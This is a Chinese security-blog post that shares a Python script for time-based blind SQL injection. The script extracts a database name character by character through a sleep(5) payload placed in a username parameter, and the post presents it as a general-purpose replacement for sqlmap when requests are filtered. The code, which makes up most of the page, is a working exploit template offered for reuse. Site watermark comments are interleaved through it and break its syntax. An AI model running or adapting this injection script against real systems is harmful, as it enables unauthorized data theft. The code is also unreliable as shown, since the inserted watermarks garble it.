安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 技术关注 > 编程茶楼 > Python > SQL延时注入脚本

SQL延时注入脚本

时间:2016-02-23来源:未知 作者:沦沦点击:
很多白帽们应该都会有一个体会,在sqlmap神器中跑延时注入时会跑不出数据,原因是因为它可能过滤了一部份的sql语句,这时就需要我们进行构造语句来进行注入,构造完成之后还需要一个好的脚本进行自动让它跑一遍,在这里分

很多白帽们应该都会有一个体会,在sqlmap神器中跑延时注入时会跑不出数据,原因是因为它可能过滤了一部份的sql语句,这时就需要我们进行构造语句来进行注入,构造完成之后还需要一个好的脚本进行自动让它跑一遍,在这里分析一个脚本给大家,延时注入用它基本是通用的。(只需要改动一下相关的payload)

//安云网,anyun.org

//安云网,anyun.org

#encoding=gbk //安云网,anyun.org

import httplib

//内容来自安云网

import time

//内容来自AnYun.ORG

import string

//安云网,anyun.org

import sys //内容来自安云网

import random //ANYUN.ORG

import urllib

//ANYUN.ORG


//内容来自安云网

headers = { //内容来自安云网

'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',

//安云网咨询系统

'Cookie':'' //ANYUN.ORG

}

//ANYUN.ORG


//内容来自AnYun.ORG

payloads = list(string.ascii_lowercase) //本文来自安云网

for i in range(0,10): //内容来自安云网

payloads.append(str(i))

//本文来自安云网

payloads += ['@','_', '.', '-', '\\', ' ','~'] //本文来自安云网

print 'Try to retrive database:'

//ANYUN.ORG

database = ''

//内容来自安云网

for i in range(1,11):

//copyright AnYun.ORG

for payload in payloads:

//内容来自AnYun.ORG

try: //内容来自安云网

conn = httplib.HTTPConnection('127.0.0.1', timeout=5) #目标地址 //内容来自安云网

s = " AND (SELECT * FROM (SELECT(if(ascii(substr(database(),%s,1))=%s,sleep(5),0)))oWxq) AND 'ABC'='ABC" % (i, ord(payload)) #写入构造好的payload

//安云网咨询系统

params = "username=xxx'" + urllib.quote(s) #注入的参数 //本文来自安云网

conn.request(method='GET', url= '/test.php?' + params, #对应的文件

//本文来自安云网

headers = headers)

//本文来自安云网

html_doc = conn.getresponse().read() //本文来自安云网

conn.close()

//内容来自安云网

print '+', //安云网咨询系统

except Exception, e:

//内容来自AnYun.ORG

print e //copyright AnYun.ORG

database += payload //安云网咨询系统

print '\n[*]', database

//内容来自安云网

break

//内容来自AnYun.ORG


//安云网,anyun.org

print '\n[Done] datase is:', database

//内容来自安云网



//内容来自安云网

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容
推荐内容